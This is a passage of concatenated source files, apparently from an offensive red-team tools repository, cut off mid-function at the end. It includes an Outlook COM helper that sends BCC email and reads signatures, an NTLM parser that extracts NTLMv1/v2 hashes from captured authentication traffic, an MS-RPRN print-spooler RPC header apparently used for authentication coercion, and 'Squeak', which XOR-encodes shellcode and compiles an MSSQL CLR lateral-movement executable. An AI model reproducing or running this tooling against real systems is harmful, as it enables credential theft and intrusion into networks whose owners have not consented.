154 | LPVOID lpUnicodeCaseTableData;
155 | DWORD dwNumberOfProcessors;
156 | DWORD dwNtGlobalFlag;
157 | LARGE_INTEGER liCriticalSectionTimeout;
158 | DWORD dwHeapSegmentReserve;
159 | DWORD dwHeapSegmentCommit;
160 | DWORD dwHeapDeCommitTotalFreeThreshold;
161 | DWORD dwHeapDeCommitFreeBlockThreshold;
162 | DWORD dwNumberOfHeaps;
163 | DWORD dwMaximumNumberOfHeaps;
164 | LPVOID lpProcessHeaps;
165 | LPVOID lpGdiSharedHandleTable;
166 | LPVOID lpProcessStarterHelper;
167 | DWORD dwGdiDCAttributeList;
168 | LPVOID lpLoaderLock;
169 | DWORD dwOSMajorVersion;
170 | DWORD dwOSMinorVersion;
171 | WORD wOSBuildNumber;
172 | WORD wOSCSDVersion;
173 | DWORD dwOSPlatformId;
174 | DWORD dwImageSubsystem;
175 | DWORD dwImageSubsystemMajorVersion;
176 | DWORD dwImageSubsystemMinorVersion;
177 | DWORD dwImageProcessAffinityMask;
178 | DWORD dwGdiHandleBuffer[34];
179 | LPVOID lpPostProcessInitRoutine;
180 | LPVOID lpTlsExpansionBitmap;
181 | DWORD dwTlsExpansionBitmapBits[32];
182 | DWORD dwSessionId;
183 | ULARGE_INTEGER liAppCompatFlags;
184 | ULARGE_INTEGER liAppCompatFlagsUser;
185 | LPVOID lppShimData;
186 | LPVOID lpAppCompatInfo;
187 | UNICODE_STR usCSDVersion;
188 | LPVOID lpActivationContextData;
189 | LPVOID lpProcessAssemblyStorageMap;
190 | LPVOID lpSystemDefaultActivationContextData;
191 | LPVOID lpSystemAssemblyStorageMap;
192 | DWORD dwMinimumStackCommit;
193 | } _PEB, * _PPEB;
194 |
195 | typedef struct
196 | {
197 | WORD offset : 12;
198 | WORD type : 4;
199 | } IMAGE_RELOC, * PIMAGE_RELOC;
200 | //===============================================================================================//
201 | #endif
202 | //===============================================================================================//
203 |
--------------------------------------------------------------------------------
/Tools/Sigwhatever/clsOutlook.cs:
--------------------------------------------------------------------------------
1 | using System;
2 | using System.Diagnostics;
3 | using System.Linq;
4 | using System.Runtime.InteropServices;
5 | using Microsoft.Office.Interop.Outlook;
6 | using Microsoft.Office.Interop.Word;
7 | using System.Collections.Generic;
8 | using Outlook = Microsoft.Office.Interop.Outlook;
9 |
10 | namespace Sigwhatever
11 | {
12 | class ClsOutlook
13 | {
14 | private Outlook.Application outlookApp;
15 | private Outlook.NameSpace nameSpace;
16 |
17 | public ClsOutlook()
18 | {
19 | //Get the Outlook object
20 | outlookApp = GetApplicationObject();
21 | nameSpace = outlookApp.GetNamespace("MAPI");
22 | }
23 |
24 | public void SendEmail(List to, string subject, string body)
25 | {
26 | try
27 | {
28 | //Send an email
29 | SendEmailThroughOutlook(to, subject, body);
30 | Console.WriteLine("\r\nSent Email");
31 | }
32 | catch (System.Exception e)
33 | {
34 | Console.WriteLine("Error sending message: " + e.Message);
35 | }
36 | ReleaseComObject(outlookApp);
37 | ReleaseComObject(nameSpace);
38 | }
39 |
40 | //method to send email to outlook
41 | public void SendEmailThroughOutlook(List toList, string subject, string body)
42 | {
43 | try
44 | {
45 | // Create the Outlook application.
46 | // Create a new mail item.
47 | Outlook.MailItem oMsg = (Outlook.MailItem)outlookApp.CreateItem(Outlook.OlItemType.olMailItem);
48 | Console.WriteLine("Made outlook mailitem object");
49 |
50 | //Subject line
51 | oMsg.Subject = subject;
52 | // Add a recipient.
53 | oMsg.DeleteAfterSubmit = true;
54 | // Set HTMLBody.
55 | //add the body of the email
56 | oMsg.HTMLBody = body;
57 |
58 | Console.WriteLine("Adding recipients from list - there are " + toList.Count);
59 | Outlook.Recipients oRecips = (Outlook.Recipients)oMsg.Recipients;
60 | Console.WriteLine("======");
61 | // Change the recipient in the next line if necessary.
62 | foreach (string emailaddress in toList)
63 | {
64 | Console.WriteLine(emailaddress);
65 | if (emailaddress.Length > 2)
66 | {
67 | Console.WriteLine("Adding " + emailaddress + " as BCC");
68 | Outlook.Recipient oRecip = (Outlook.Recipient)oRecips.Add(emailaddress);
69 | oRecip.Type = (int)OlMailRecipientType.olBCC;
70 | oRecip.Resolve();
71 | oRecip = null;
72 | }
73 | }
74 | Console.WriteLine("Done adding recipients, added {0} ", oRecips.Count);
75 | // Send.
76 | oMsg.Send();
77 |
78 | // Clean up.
79 | oRecips = null;
80 | oMsg = null;
81 | //oApp = null;
82 | }
83 | catch (System.Exception ex)
84 | {
85 | Console.WriteLine("Failed to send email: " + ex.Message);
86 | }
87 | }
88 |
89 | public string GetExistingSig()
90 | {
91 | string signature = "";
92 |
93 | // Create the Outlook application.
94 | // Create a new mail item.
95 | Microsoft.Office.Interop.Word.Bookmark bkm = null;
96 | Microsoft.Office.Interop.Word.Bookmarks bkms = null;
97 | Microsoft.Office.Interop.Word.Document document = null;
98 | Outlook.Inspector inspector = null;
99 | Outlook.MailItem oMsg = null;
100 |
101 | try
102 | {
103 | oMsg = (Outlook.MailItem)outlookApp.CreateItem(Outlook.OlItemType.olMailItem);
104 |
105 | //Add an attachment.
106 | inspector = oMsg.GetInspector;
107 | document = (Microsoft.Office.Interop.Word.Document)inspector.WordEditor;
108 | document.Bookmarks.ShowHidden = true;
109 | bkms = document.Bookmarks;
110 | bkms.ShowHidden = true;
111 | }
112 | catch(System.Exception)
113 | {
114 | Console.WriteLine("[!] Couldn't get Outlook COM object");
115 | return null;
116 | }
117 |
118 | try
119 | {
120 | try
121 | {
122 | bkm = bkms["_MailAutoSig"];
123 | }
124 | catch (System.Exception ex)
125 | {
126 | // skip the exception
127 | }
128 | if (bkm != null)
129 | {
130 | Microsoft.Office.Interop.Word.Range bkmRange = bkm.Range;
131 | var bkmText = bkmRange.Text;
132 | if (string.IsNullOrWhiteSpace(bkmText))
133 | Console.WriteLine("Signature Empty");
134 | else
135 | //At this point, we know there is a signature already present - the text of the signature is stored in bkmText
136 | Console.WriteLine("Existing Signature is: " + bkmText);
137 | signature = bkmText.ToString();
138 | Marshal.ReleaseComObject(bkmRange); bkmRange = null;
139 | Marshal.ReleaseComObject(bkm); bkm = null;
140 | }
141 | else
142 | {
143 | Console.WriteLine("No Signature");
144 | }
145 | }
146 | catch (System.Exception ee)
147 | {
148 | Console.WriteLine("Couldn't get existing signature from email body: " + ee.Message);
149 | }
150 |
151 | try
152 | {
153 | oMsg.Close(OlInspectorClose.olDiscard);
154 | document.Close(WdSaveOptions.wdDoNotSaveChanges);
155 | inspector.Close(OlInspectorClose.olDiscard);
156 | }
157 | catch (System.Exception)
158 | {
159 | Console.WriteLine("Couldn't close Outlook inspector.");
160 | }
161 |
162 | try
163 | {
164 | }
165 | catch (System.Exception)
166 | {
167 | Console.WriteLine("Couldn't close Word doc from signature inspection");
168 | }
169 | return signature;
170 | }
171 |
172 | public static void ReleaseComObject(object obj)
173 | {
174 | if (obj != null)
175 | {
176 | Marshal.ReleaseComObject(obj);
177 | obj = null;
178 | }
179 | }
180 |
181 | private static Outlook.Application GetApplicationObject()
182 | {
183 |
184 | Outlook.Application application = null;
185 |
186 | // Check whether there is an Outlook process running.
187 | if (Process.GetProcessesByName("OUTLOOK").Count() > 0)
188 | {
189 | // If so, use the GetActiveObject method to obtain the process and cast it to an Application object.
190 | application = Marshal.GetActiveObject("Outlook.Application") as Outlook.Application;
191 | }
192 | else
193 | {
194 | // If not, create a new instance of Outlook and log on to the default profile.
195 | Console.WriteLine("[!] Outlook not running, you're going to need to provide creds");
196 | application = new Outlook.Application();
197 | Outlook.NameSpace nameSpace = application.GetNamespace("MAPI");
198 | nameSpace.Logon("", "", false, false);
199 | nameSpace = null;
200 | }
201 | // Return the Outlook Application object.
202 | return application;
203 | }
204 | }
205 | }
206 |
--------------------------------------------------------------------------------
/Tools/Sigwhatever/NTLM.cs:
--------------------------------------------------------------------------------
1 | using Microsoft.Office.Interop.Word;
2 | using System;
3 | using System.Collections.Generic;
4 | using System.IO;
5 |
6 | namespace Sigwhatever
7 | {
8 | class NTLM
9 | {
10 |
11 | public static List lstCaptured = new List();
12 |
13 | public static void GetNTLMResponse(byte[] field, string sourceIP, string sourcePort, string protocol, string protocolPort, string Logfile)
14 | {
15 | Crypto Crypt1 = new Crypto();
16 | string payload = System.BitConverter.ToString(field);
17 | payload = payload.Replace("-", String.Empty);
18 | string session = sourceIP + ":" + sourcePort;
19 | int index = payload.IndexOf("4E544C4D53535000");
20 | string lmResponse = "";
21 | string ntlmResponse = "";
22 | int ntlmLength = 0;
23 | string challenge = "";
24 | string domain = "";
25 | string user = "";
26 | string host = "";
27 |
28 |
29 | if ((String.Equals(protocol, "HTTP") || String.Equals(protocol, "Proxy") || index > 0) && payload.Substring((index + 16), 8) == "03000000")
30 | {
31 | int ntlmsspOffset = index / 2;
32 | int lmLength = (int)Util.UInt16DataLength((ntlmsspOffset + 12), field);
33 | int lmOffset = (int)Util.UInt32DataLength((ntlmsspOffset + 16), field);
34 | byte[] lmPayload = new byte[lmLength];
35 | System.Buffer.BlockCopy(field, (ntlmsspOffset + lmOffset), lmPayload, 0, lmPayload.Length);
36 | lmResponse = System.BitConverter.ToString(lmPayload).Replace("-", String.Empty);
37 | ntlmLength = (int)Util.UInt16DataLength((ntlmsspOffset + 20), field);
38 | int ntlmOffset = (int)Util.UInt32DataLength((ntlmsspOffset + 24), field);
39 | byte[] ntlmPayload = new byte[ntlmLength];
40 | System.Buffer.BlockCopy(field, (ntlmsspOffset + ntlmOffset), ntlmPayload, 0, ntlmPayload.Length);
41 | ntlmResponse = System.BitConverter.ToString(ntlmPayload).Replace("-", String.Empty);
42 | int domainLength = (int)Util.UInt16DataLength((ntlmsspOffset + 28), field);
43 | int domainOffset = (int)Util.UInt32DataLength((ntlmsspOffset + 32), field);
44 | byte[] domainPayload = new byte[domainLength];
45 | System.Buffer.BlockCopy(field, (ntlmsspOffset + domainOffset), domainPayload, 0, domainPayload.Length);
46 | domain = Util.DataToString((ntlmsspOffset + domainOffset), domainLength, field);
47 | int userLength = (int)Util.UInt16DataLength((ntlmsspOffset + 36), field);
48 | int userOffset = (int)Util.UInt32DataLength((ntlmsspOffset + 40), field);
49 | byte[] userPayload = new byte[userLength];
50 | System.Buffer.BlockCopy(field, (ntlmsspOffset + userOffset), userPayload, 0, userPayload.Length);
51 | user = Util.DataToString((ntlmsspOffset + userOffset), userLength, field);
52 | int hostLength = (int)Util.UInt16DataLength((ntlmsspOffset + 44), field);
53 | int hostOffset = (int)Util.UInt32DataLength((ntlmsspOffset + 48), field);
54 | byte[] hostPayload = new byte[hostLength];
55 | System.Buffer.BlockCopy(field, (ntlmsspOffset + hostOffset), hostPayload, 0, hostPayload.Length);
56 | host = Util.DataToString((ntlmsspOffset + hostOffset), hostLength, field);
57 |
58 |
59 |
60 | if (!String.Equals(protocol, "SMB"))
61 | {
62 | try
63 | {
64 | challenge = Program.httpSessionTable[session].ToString();
65 | }
66 | catch
67 | {
68 |
69 | try
70 | {
71 | //need better better method of tracking challenges when source port changes between challenge and response
72 | int newSourcePort = Int32.Parse(sourcePort) - 1;
73 | string newSession = sourceIP + ":" + newSourcePort;
74 | challenge = Program.httpSessionTable[newSession].ToString();
75 | }
76 | catch
77 | {
78 | challenge = "";
79 | }
80 |
81 | }
82 |
83 | }
84 |
85 | if (ntlmLength > 24)
86 | {
87 | string ntlmV2Hash = user + "::" + domain + ":" + challenge + ":" + ntlmResponse.Insert(32, ":");
88 |
89 | lock (Program.outputList)
90 | {
91 |
92 | if (String.Equals(protocol, "SMB") && Program.enabledSMB || !String.Equals(protocol, "SMB"))
93 | {
94 |
95 | if (Program.enabledMachineAccounts || (!Program.enabledMachineAccounts && !user.EndsWith("$")))
96 | {
97 |
98 | if (!String.IsNullOrEmpty(challenge))
99 | {
100 |
101 | if (!lstCaptured.Contains(domain + user))
102 | {
103 | Console.WriteLine(String.Format("[+] [{0}] {1}({2}) NTLMv2 captured for {3}\\{4} from {5}({6}):{7}:{8}", DateTime.Now.ToString("s"), protocol, protocolPort, domain, user, sourceIP, host, sourcePort, ntlmV2Hash));
104 | string printme = Crypt1.Encrypt(ntlmV2Hash, TCPHTTPCap.key);
105 | //Must check the log file exists here at some point....todo
106 | if (Logfile != null && Logfile.Length > 1)
107 | {
108 | File.AppendAllText(Logfile, printme);
109 | File.AppendAllText(Logfile, "\n\n");
110 | }
111 |
112 | lstCaptured.Add(domain + user);
113 | }
114 | else
115 | {
116 | Console.WriteLine("Already got a hash for " + user);
117 | }
118 |
119 |
120 |
121 |
122 |
123 |
124 | }
125 |
126 |
127 | }
128 |
129 |
130 | }
131 |
132 |
133 | }
134 |
135 | }
136 | else if (ntlmLength == 24)
137 | {
138 | string ntlmV1Hash = user + "::" + domain + ":" + lmResponse + ":" + ntlmResponse + ":" + challenge;
139 |
140 | lock (Program.outputList)
141 | {
142 |
143 | if (Program.enabledSMB)
144 | {
145 |
146 | if (Program.enabledMachineAccounts || (!Program.enabledMachineAccounts && !user.EndsWith("$")))
147 | {
148 |
149 | if (!String.IsNullOrEmpty(challenge))
150 | {
151 |
152 |
153 | Console.WriteLine(String.Format("[+] [{0}] {1}({2}) NTLMv1 captured for {3}\\{4} from {5}({6}):{7}:{8}", DateTime.Now.ToString("s"), protocol, protocolPort, domain, user, sourceIP, host, sourcePort, ntlmV1Hash));
154 | string printme = Crypt1.Encrypt(ntlmV1Hash, TCPHTTPCap.key);
155 | if (Logfile != null)
156 | {
157 | File.AppendAllText(Logfile, printme);
158 | File.AppendAllText(Logfile, "\n\n");
159 | }
160 |
161 |
162 |
163 |
164 | }
165 |
166 |
167 | }
168 |
169 |
170 | }
171 |
172 |
173 | }
174 |
175 | }
176 |
177 |
178 | }
179 |
180 | }
181 |
182 | }
183 |
184 | }
--------------------------------------------------------------------------------
/Tools/spoolsystem/SpoolTrigger/ms-rprn_h.h:
--------------------------------------------------------------------------------
1 |
2 |
3 | /* this ALWAYS GENERATED file contains the definitions for the interfaces */
4 |
5 |
6 | /* File created by MIDL compiler version 8.01.0622 */
7 | /* at Mon Jan 18 21:14:07 2038
8 | */
9 | /* Compiler settings for ms-rprn.idl:
10 | Oicf, W1, Zp8, env=Win64 (32b run), target_arch=AMD64 8.01.0622
11 | protocol : all , ms_ext, c_ext, robust
12 | error checks: allocation ref bounds_check enum stub_data
13 | VC __declspec() decoration level:
14 | __declspec(uuid()), __declspec(selectany), __declspec(novtable)
15 | DECLSPEC_UUID(), MIDL_INTERFACE()
16 | */
17 | /* @@MIDL_FILE_HEADING( ) */
18 |
19 |
20 |
21 | /* verify that the version is high enough to compile this file*/
22 | #ifndef __REQUIRED_RPCNDR_H_VERSION__
23 | #define __REQUIRED_RPCNDR_H_VERSION__ 500
24 | #endif
25 |
26 | #include "rpc.h"
27 | #include "rpcndr.h"
28 |
29 | #ifndef __RPCNDR_H_VERSION__
30 | #error this stub requires an updated version of
31 | #endif /* __RPCNDR_H_VERSION__ */
32 |
33 |
34 | #ifndef __ms2Drprn_h_h__
35 | #define __ms2Drprn_h_h__
36 |
37 | #if defined(_MSC_VER) && (_MSC_VER >= 1020)
38 | #pragma once
39 | #endif
40 |
41 | /* Forward Declarations */
42 |
43 | /* header files for imported files */
44 | #include "oaidl.h"
45 |
46 | #ifdef __cplusplus
47 | extern "C"{
48 | #endif
49 |
50 |
51 | #ifndef __winspool_INTERFACE_DEFINED__
52 | #define __winspool_INTERFACE_DEFINED__
53 |
54 | /* interface winspool */
55 | /* [unique][endpoint][ms_union][version][uuid] */
56 |
57 | typedef struct _DEVMODE_CONTAINER
58 | {
59 | DWORD cbBuf;
60 | /* [unique][size_is] */ BYTE *pDevMode;
61 | } DEVMODE_CONTAINER;
62 |
63 | typedef struct _RPC_V2_NOTIFY_OPTIONS_TYPE
64 | {
65 | unsigned short Type;
66 | unsigned short Reserved0;
67 | DWORD Reserved1;
68 | DWORD Reserved2;
69 | DWORD Count;
70 | /* [unique][size_is] */ unsigned short *pFields;
71 | } RPC_V2_NOTIFY_OPTIONS_TYPE;
72 |
73 | typedef struct _RPC_V2_NOTIFY_OPTIONS
74 | {
75 | DWORD Version;
76 | DWORD Reserved;
77 | DWORD Count;
78 | /* [unique][size_is] */ RPC_V2_NOTIFY_OPTIONS_TYPE *pTypes;
79 | } RPC_V2_NOTIFY_OPTIONS;
80 |
81 | typedef unsigned short LANGID;
82 |
83 | typedef /* [context_handle] */ void *GDI_HANDLE;
84 |
85 | typedef /* [context_handle] */ void *PRINTER_HANDLE;
86 |
87 | typedef /* [handle] */ wchar_t *STRING_HANDLE;
88 |
89 | DWORD RpcEnumPrinters(
90 | /* [in] */ handle_t IDL_handle);
91 |
92 | DWORD RpcOpenPrinter(
93 | /* [unique][string][in] */ STRING_HANDLE pPrinterName,
94 | /* [out] */ PRINTER_HANDLE *pHandle,
95 | /* [unique][string][in] */ wchar_t *pDatatype,
96 | /* [in] */ DEVMODE_CONTAINER *pDevModeContainer,
97 | /* [in] */ DWORD AccessRequired);
98 |
99 | DWORD RpcSetJob(
100 | /* [in] */ handle_t IDL_handle);
101 |
102 | DWORD RpcGetJob(
103 | /* [in] */ handle_t IDL_handle);
104 |
105 | DWORD RpcEnumJobs(
106 | /* [in] */ handle_t IDL_handle);
107 |
108 | DWORD RpcAddPrinter(
109 | /* [in] */ handle_t IDL_handle);
110 |
111 | DWORD RpcDeletePrinter(
112 | /* [in] */ handle_t IDL_handle);
113 |
114 | DWORD RpcSetPrinter(
115 | /* [in] */ handle_t IDL_handle);
116 |
117 | DWORD RpcGetPrinter(
118 | /* [in] */ handle_t IDL_handle);
119 |
120 | DWORD RpcAddPrinterDriver(
121 | /* [in] */ handle_t IDL_handle);
122 |
123 | DWORD RpcEnumPrinterDrivers(
124 | /* [in] */ handle_t IDL_handle);
125 |
126 | DWORD RpcGetPrinterDriver(
127 | /* [in] */ handle_t IDL_handle);
128 |
129 | DWORD RpcGetPrinterDriverDirectory(
130 | /* [in] */ handle_t IDL_handle);
131 |
132 | DWORD RpcDeletePrinterDriver(
133 | /* [in] */ handle_t IDL_handle);
134 |
135 | DWORD RpcAddPrintProcessor(
136 | /* [in] */ handle_t IDL_handle);
137 |
138 | DWORD RpcEnumPrintProcessors(
139 | /* [in] */ handle_t IDL_handle);
140 |
141 | DWORD RpcGetPrintProcessorDirectory(
142 | /* [in] */ handle_t IDL_handle);
143 |
144 | DWORD RpcStartDocPrinter(
145 | /* [in] */ handle_t IDL_handle);
146 |
147 | DWORD RpcStartPagePrinter(
148 | /* [in] */ handle_t IDL_handle);
149 |
150 | DWORD RpcWritePrinter(
151 | /* [in] */ handle_t IDL_handle);
152 |
153 | DWORD RpcEndPagePrinter(
154 | /* [in] */ handle_t IDL_handle);
155 |
156 | DWORD RpcAbortPrinter(
157 | /* [in] */ handle_t IDL_handle);
158 |
159 | DWORD RpcReadPrinter(
160 | /* [in] */ handle_t IDL_handle);
161 |
162 | DWORD RpcEndDocPrinter(
163 | /* [in] */ handle_t IDL_handle);
164 |
165 | DWORD RpcAddJob(
166 | /* [in] */ handle_t IDL_handle);
167 |
168 | DWORD RpcScheduleJob(
169 | /* [in] */ handle_t IDL_handle);
170 |
171 | DWORD RpcGetPrinterData(
172 | /* [in] */ handle_t IDL_handle);
173 |
174 | DWORD RpcSetPrinterData(
175 | /* [in] */ handle_t IDL_handle);
176 |
177 | DWORD RpcWaitForPrinterChange(
178 | /* [in] */ handle_t IDL_handle);
179 |
180 | DWORD RpcClosePrinter(
181 | /* [out][in] */ PRINTER_HANDLE *phPrinter);
182 |
183 | DWORD RpcAddForm(
184 | /* [in] */ handle_t IDL_handle);
185 |
186 | DWORD RpcDeleteForm(
187 | /* [in] */ handle_t IDL_handle);
188 |
189 | DWORD RpcGetForm(
190 | /* [in] */ handle_t IDL_handle);
191 |
192 | DWORD RpcSetForm(
193 | /* [in] */ handle_t IDL_handle);
194 |
195 | DWORD RpcEnumForms(
196 | /* [in] */ handle_t IDL_handle);
197 |
198 | DWORD RpcEnumPorts(
199 | /* [in] */ handle_t IDL_handle);
200 |
201 | DWORD RpcEnumMonitors(
202 | /* [in] */ handle_t IDL_handle);
203 |
204 | void Opnum37NotUsedOnWire(
205 | /* [in] */ handle_t IDL_handle);
206 |
207 | void Opnum38NotUsedOnWire(
208 | /* [in] */ handle_t IDL_handle);
209 |
210 | DWORD RpcDeletePort(
211 | /* [in] */ handle_t IDL_handle);
212 |
213 | DWORD RpcCreatePrinterIC(
214 | /* [in] */ handle_t IDL_handle);
215 |
216 | DWORD RpcPlayGdiScriptOnPrinterIC(
217 | /* [in] */ handle_t IDL_handle);
218 |
219 | DWORD RpcDeletePrinterIC(
220 | /* [in] */ handle_t IDL_handle);
221 |
222 | void Opnum43NotUsedOnWire(
223 | /* [in] */ handle_t IDL_handle);
224 |
225 | void Opnum44NotUsedOnWire(
226 | /* [in] */ handle_t IDL_handle);
227 |
228 | void Opnum45NotUsedOnWire(
229 | /* [in] */ handle_t IDL_handle);
230 |
231 | DWORD RpcAddMonitor(
232 | /* [in] */ handle_t IDL_handle);
233 |
234 | DWORD RpcDeleteMonitor(
235 | /* [in] */ handle_t IDL_handle);
236 |
237 | DWORD RpcDeletePrintProcessor(
238 | /* [in] */ handle_t IDL_handle);
239 |
240 | void Opnum49NotUsedOnWire(
241 | /* [in] */ handle_t IDL_handle);
242 |
243 | void Opnum50NotUsedOnWire(
244 | /* [in] */ handle_t IDL_handle);
245 |
246 | DWORD RpcEnumPrintProcessorDatatypes(
247 | /* [in] */ handle_t IDL_handle);
248 |
249 | DWORD RpcResetPrinter(
250 | /* [in] */ handle_t IDL_handle);
251 |
252 | DWORD RpcGetPrinterDriver2(
253 | /* [in] */ handle_t IDL_handle);
254 |
255 | void Opnum54NotUsedOnWire(
256 | /* [in] */ handle_t IDL_handle);
257 |
258 | void Opnum55NotUsedOnWire(
259 | /* [in] */ handle_t IDL_handle);
260 |
261 | DWORD RpcFindClosePrinterChangeNotification(
262 | /* [in] */ handle_t IDL_handle);
263 |
264 | void Opnum57NotUsedOnWire(
265 | /* [in] */ handle_t IDL_handle);
266 |
267 | DWORD RpcReplyOpenPrinter(
268 | /* [in] */ handle_t IDL_handle);
269 |
270 | DWORD RpcRouterReplyPrinter(
271 | /* [in] */ handle_t IDL_handle);
272 |
273 | DWORD RpcReplyClosePrinter(
274 | /* [in] */ handle_t IDL_handle);
275 |
276 | DWORD RpcAddPortEx(
277 | /* [in] */ handle_t IDL_handle);
278 |
279 | DWORD RpcRemoteFindFirstPrinterChangeNotification(
280 | /* [in] */ handle_t IDL_handle);
281 |
282 | void Opnum63NotUsedOnWire(
283 | /* [in] */ handle_t IDL_handle);
284 |
285 | void Opnum64NotUsedOnWire(
286 | /* [in] */ handle_t IDL_handle);
287 |
288 | DWORD RpcRemoteFindFirstPrinterChangeNotificationEx(
289 | /* [in] */ PRINTER_HANDLE hPrinter,
290 | /* [in] */ DWORD fdwFlags,
291 | /* [in] */ DWORD fdwOptions,
292 | /* [unique][string][in] */ wchar_t *pszLocalMachine,
293 | /* [in] */ DWORD dwPrinterLocal,
294 | /* [unique][in] */ RPC_V2_NOTIFY_OPTIONS *pOptions);
295 |
296 |
297 |
298 | extern RPC_IF_HANDLE winspool_v1_0_c_ifspec;
299 | extern RPC_IF_HANDLE winspool_v1_0_s_ifspec;
300 | #endif /* __winspool_INTERFACE_DEFINED__ */
301 |
302 | /* Additional Prototypes for ALL interfaces */
303 |
304 | handle_t __RPC_USER STRING_HANDLE_bind ( STRING_HANDLE );
305 | void __RPC_USER STRING_HANDLE_unbind( STRING_HANDLE, handle_t );
306 |
307 | void __RPC_USER PRINTER_HANDLE_rundown( PRINTER_HANDLE );
308 |
309 | /* end of Additional Prototypes */
310 |
311 | #ifdef __cplusplus
312 | }
313 | #endif
314 |
315 | #endif
316 |
--------------------------------------------------------------------------------
/Tools/Squeak/Home.xaml.cs:
--------------------------------------------------------------------------------
1 | using Microsoft.CSharp;
2 | using Microsoft.Win32;
3 | using System;
4 | using System.CodeDom.Compiler;
5 | using System.Collections.Generic;
6 | using System.IO;
7 | using System.Linq;
8 | using System.Security.Cryptography;
9 | using System.Text;
10 | using System.Threading.Tasks;
11 | using System.Windows;
12 | using System.Windows.Controls;
13 | using System.Windows.Data;
14 | using System.Windows.Documents;
15 | using System.Windows.Input;
16 | using System.Windows.Media;
17 | using System.Windows.Media.Imaging;
18 | using System.Windows.Navigation;
19 | using System.Windows.Shapes;
20 |
21 | namespace Squeak
22 | {
23 | ///
24 | /// Interaction logic for Home.xaml
25 | ///
26 | public partial class Home : Page
27 | {
28 | public Home()
29 | {
30 | InitializeComponent();
31 | }
32 |
33 |
34 | private void RtbDebug_TextChanged(object sender, EventArgs e)
35 | {
36 |
37 | // scroll it automatically
38 | rtbDebug.ScrollToEnd();
39 | }
40 | private void Generate_Click(object sender, RoutedEventArgs e)
41 | {
42 | rtbDebug.TextChanged += RtbDebug_TextChanged;
43 |
44 | string rawfile = "";
45 | string server = "";
46 | string port = "";
47 | string database = "";
48 | string username = "";
49 | string password = "";
50 | string outputfilename = "latmovemssqloutput.exe";
51 | string winauth = "false";
52 |
53 | try
54 | {
55 | rawfile = txtRaw.Text.Trim();
56 | server = txtServer.Text.Trim();
57 | port = txtPort.Text.Trim();
58 | database = txtDatabase.Text.Trim();
59 | username = txtUsername.Text.Trim();
60 | password = txtPassword.Text.Trim();
61 | if (cbWinauth.IsChecked == true)
62 | {
63 | winauth = "TRUE";
64 | username = "Windows Auth";
65 | password = "blank";
66 | }
67 |
68 | }
69 | catch (Exception ex)
70 | {
71 |
72 | Environment.Exit(0);
73 | }
74 | rtbDebug.AppendText("\nStarting.");
75 |
76 | //Check the shellcode file is accessible
77 | try
78 | {
79 | File.ReadAllBytes(rawfile);
80 |
81 | }
82 | catch(Exception ex)
83 | {
84 | rtbDebug.AppendText("\nCould not read shellcode file");
85 | return;
86 | }
87 |
88 | //Grab the payload bytes and make the xored hex string
89 | byte[] key = new byte[] { 0xDE };
90 | byte[] shellcode = File.ReadAllBytes(rawfile);
91 | byte[] shellcodexor = exclusiveOR(shellcode, key);
92 | string hex = ByteArrayToString(shellcodexor);
93 |
94 |
95 | clsCode codeclass = new clsCode();
96 | //Generate the CLR DLL and read back in the hash/bytes
97 | string dllcode = codeclass.getdllcode(hex);
98 | string dllerrors = compileDLL(dllcode);
99 |
100 | if(dllerrors.Length > 2)
101 | {
102 | rtbDebug.AppendText("\nError compiling DLL: " + dllerrors);
103 | return;
104 | }
105 | byte[] dllbytes = File.ReadAllBytes("clrpoc.dll");
106 | string dllstring = "0x" + ByteArrayToStringFlat(dllbytes);
107 | string sha512hash = "0x" + hashdata(dllbytes);
108 | rtbDebug.AppendText("\nSha512 hash of DLL is " + sha512hash);
109 |
110 |
111 |
112 | string code = codeclass.getexecode(server, port, database, username, password, sha512hash, dllstring, winauth);
113 |
114 | try
115 | {
116 | string sqlerrors = compileMSSQL(code, outputfilename);
117 | if (sqlerrors.Length > 1)
118 | {
119 | rtbDebug.AppendText("\nError compiling lat move exe: " + sqlerrors);
120 | }
121 | else
122 | {
123 | rtbDebug.AppendText("\nYour exe has been written to: " + System.Environment.CurrentDirectory + @"\" + outputfilename);
124 | }
125 | }
126 | catch (Exception exc)
127 | {
128 | rtbDebug.AppendText("\nSomething went wrong: " + exc.Message);
129 | }
130 |
131 | }
132 |
133 |
134 |
135 | private void cbWinauth_CheckedChanged(object sender, RoutedEventArgs e)
136 | {
137 | if (cbWinauth.IsChecked == true)
138 | {
139 | txtUsername.IsEnabled = false;
140 | txtPassword.IsEnabled = false;
141 | }
142 | else
143 | {
144 | txtUsername.IsEnabled = true;
145 | txtPassword.IsEnabled = true;
146 | }
147 | }
148 |
149 |
150 |
151 |
152 | private static string hashdata(byte[] data)
153 | {
154 | byte[] bytes = new byte[] { };
155 | using (SHA512 shaM = new SHA512Managed())
156 | {
157 | bytes = shaM.ComputeHash(data);
158 | }
159 | // Convert byte array to a string
160 | StringBuilder builder = new StringBuilder();
161 | for (int i = 0; i < bytes.Length; i++)
162 | {
163 | builder.Append(bytes[i].ToString("x2"));
164 | }
165 | return builder.ToString();
166 |
167 | }
168 |
169 | public static byte[] exclusiveOR(byte[] arr1, byte[] arr2)
170 | {
171 |
172 |
173 | byte[] result = new byte[arr1.Length];
174 |
175 | for (int i = 0; i < arr1.Length; ++i)
176 | result[i] = (byte)(arr1[i] ^ arr2[0]);
177 |
178 | return result;
179 | }
180 |
181 | public static string ByteArrayToString(byte[] ba)
182 | {
183 | StringBuilder hex = new StringBuilder(ba.Length * 2);
184 | foreach (byte b in ba)
185 | hex.AppendFormat("{0:x2}", b);
186 | return hex.ToString();
187 | }
188 |
189 | public static string ByteArrayToStringFlat(byte[] ba)
190 | {
191 |
192 | StringBuilder builder = new StringBuilder();
193 | for (int i = 0; i < ba.Length; i++)
194 | {
195 | builder.Append(ba[i].ToString("x2"));
196 | }
197 | return builder.ToString();
198 | }
199 |
200 |
201 |
202 | private static string compileMSSQL(string code, string outputfilename)
203 | {
204 | string errors = "";
205 | var csc = new CSharpCodeProvider(new Dictionary() { { "CompilerVersion", "v4.0" } });
206 | var parameters = new CompilerParameters(new[] { "system.dll", "mscorlib.dll", "System.Core.dll", "System.Data.dll" }, outputfilename, false);
207 | parameters.GenerateExecutable = true;
208 | CompilerResults results = csc.CompileAssemblyFromSource(parameters, code);
209 | results.Errors.Cast().ToList().ForEach(error => errors = errors + "\nLine " + error.Line + ": " + error.ErrorText);
210 | return errors;
211 |
212 |
213 | }
214 |
215 | private static string compileDLL(string code)
216 | {
217 | string errors = "";
218 | var csc = new CSharpCodeProvider(new Dictionary() { { "CompilerVersion", "v4.0" } });
